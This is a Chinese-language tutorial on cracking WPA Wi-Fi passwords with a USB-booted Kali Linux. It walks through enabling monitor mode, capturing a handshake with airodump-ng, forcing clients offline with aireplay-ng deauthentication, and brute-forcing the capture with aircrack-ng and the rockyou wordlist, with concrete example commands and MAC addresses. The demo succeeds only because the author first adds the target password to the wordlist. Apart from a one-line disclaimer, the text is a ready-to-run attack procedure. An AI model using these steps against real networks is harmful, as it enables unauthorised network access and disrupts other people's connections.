环境准备:   方法一(选择该方式):Kali Linux、笔记本一台、U盘(至少8G)   方法二:Kali Linux、外置网卡、笔记本一台、VM

U盘制作UEFI版Kali Linux教程,https://www.likecs.com/show-204207764.html

 特别说明,本文,主要是使用方法一环境进行破解,如果有外置网卡,那就非常简单了,直接通过Vmware(虚拟机)外接网卡即可

  本文,采用airmon-ng技术进行抓包破解操作

1.开机启动设置

(1).进入bios界面

每台的电脑型号对应不同按键的启动bios方式不同,常用的笔记本型号的进入bios方式。如下图所示,其它型号的可自行百度往下看。(如,百度搜索:笔记本进入bios按键')

站长笔记本是F2进入BIOS系统

因每台品牌笔记本BIOS界面不同这里就不举例了

进入BIOS之后选择之前U盘制作好的UEFI版Kali Linux

2.启动Kali Linux

(1).选择后载入Kali Linux

(2).注意:选择'kali GNU/Linux'模式,不要选择其他选项可能会导致重装系统、数据不见等一系列的问题

(3).进入Kali Linux登录界面

输入安装系统时设置的密码这里登录的是root(最高权限账户)非用户账户(因部分指令用户权限不够)

(4).打开终端窗口

数字1左侧的黑色命令符窗口就是我们要打开的终端了

3.无线wifi破解实验

(1).ifconfig

  命令ifconfig查看网卡信息,有wlan0表示网卡支持监听模式能够用来破解wifi

(2).airmon-ng

  使用命令airmon-ng start wlan0开启网卡监听模式

(3).iwconfig

  使用iwconfig命令查看网卡信息, wlan0mon网卡名加了mon则表示'监听模式'开启成功

(4).airodump-ng扫描

  使用命令airodump-ng wlan0mon,开始扫描范围内WiFi,按ctrl+c结束任务

参数意义
BSSIDwifi的MAC地址
PWR信号强弱程度,数值越小信号越强
DATA数据量,越大使用的人就越多
CH信道频率(频道)
ESSIDwifi的名称,中文可能会有乱码

(5).抓包

接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon。注,--bssid后面跟着的是'BSSID(MAC地址)',-c后面跟着的是'CH(信道)',-w后面跟着抓到的包保存到哪,最后是网卡信息'wlan0mon'
例:我想要破解BSSID为AE:0F:5B:FE:22:84的无线wifi,格式为:

airodump-ng --bssid AE:0F:5B:FE:22:84 -c 1 -w /home/fwwl 1.cap wlan0mon

已经开始监听该MAC地址的数据包

这个窗口不要关闭,再开启一个终端

输入airepaly-ng -0 0 -c STATION(任选其一) -a bssid 网卡名(一般为wlan0mon)

如:我想要攻击STATION(MAC地址)为,格式为:

aireplay-ng -0 0 -c 36:44:19:A6:92:FE -a AE:0F:5B:FE:22:84 wlan0mon

参数含义

(0 WiFi设备无限次数,-0 8则攻击8次。攻击原理是:发送大量数据包让设备掉线,设备会再自动连接,在自动连接过程会进行TCP三次握手,会发送tcp包(里面包含加密的密码数据),我方监听去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,

数据包里面的密码是哈希加密的,哈希加密只能正向)

当'airodump-ng --bssid BSSID'窗口出现WPA handshake时,表示抓包成功。

出现'WPA handshake时'时,需要让两个终端都按Ctrl+c停止,不然会一直断网的

使用自己热点演示,只做技术分享切勿恶意攻击他人网络

(6).解压kali字典文件

  解压kali自带的字典文件.路径:/usr/share/wordlists/rockyou.txt.gz

此字典为Kali Linux系统集成,如自己有整合的字典可以使用自己的进行跑包破解

(7).跑包(破解密码)

  格式:aircrack-ng -w 字典路径 握手包路径,回车后开始爆破

例:aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/fwwl/1.cap-01.cap

开始跑包

如何添加新组合到字典

添加'fui2023'到rockyou密码字典中

vim /usr/share/wordlists/rockyou.txt

fui2023

ESC
:wq(说明:w代表保存 q代表退出)

再试一次

得到密码:fui2023,整体破解流程结束

特别说明:暴力破解并不简单,需要足够强大的字典和时间,可以通过字典生成工具生成自己的字典,字典越强大越容易破解

人只要不失去方向,就不会失去自己
人生重要的不是所在的位置,而是所朝的方向。